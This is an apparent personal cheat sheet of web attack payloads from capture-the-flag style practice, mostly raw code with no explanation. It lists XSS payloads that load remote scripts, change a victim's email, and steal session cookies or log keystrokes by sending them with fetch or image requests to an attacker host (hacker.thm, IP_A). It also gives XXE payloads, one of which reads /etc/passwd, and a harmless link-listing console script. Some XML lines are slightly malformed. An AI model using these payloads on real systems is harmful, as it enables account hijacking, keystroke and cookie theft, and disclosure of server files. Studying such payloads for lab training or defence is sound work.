# XSS
< img src='http://IP_A/RECURSO' />
< script src='http://IP_A/script' > </script>
<script>alert('XSS');</script>
<script>user.changeEmail('attacker@hacker.thm');</script>

session stealing:
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

key logger:
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

# cookie stealing
< img src=RECURSO onerror=this.src='http://IP_A/?cookies='+btoa(document.cookie) />

# source code links checker (browser dev console)
browser dev console:
var x = document.querySelectorAll("a");
var myarray = []
for (var i=0; i<x.length; i++){
var nametext = x[i].textContent;
var cleantext = nametext.replace(/\s+/g, ' ').trim();
var cleanlink = x[i].href;
myarray.push([cleantext,cleanlink]);
};
function make_table() {
    var table = '<table><thead><th>Name</th><th>Links</th></thead><tbody>';
   for (var i=0; i<myarray.length; i++) {
            table += '<tr><td>'+ myarray[i][0] + '</td><td>'+myarray[i][1]+'</td></tr>';
    };
 
    var w = window.open("");
w.document.write(table); 
}
make_table()

# XXE testing:
!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "TESTEANDO_XXE"> ]>
<post>
    <title>Example Post</title>
    <description>&example;</description>
    <markdown>Example Markdown</markdown>
</post>

# XXE file read:
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<post>
    <title>Example Post</title>
    <description>&test;></description>
    <markdown>Example Markdown></markdown>
</post>
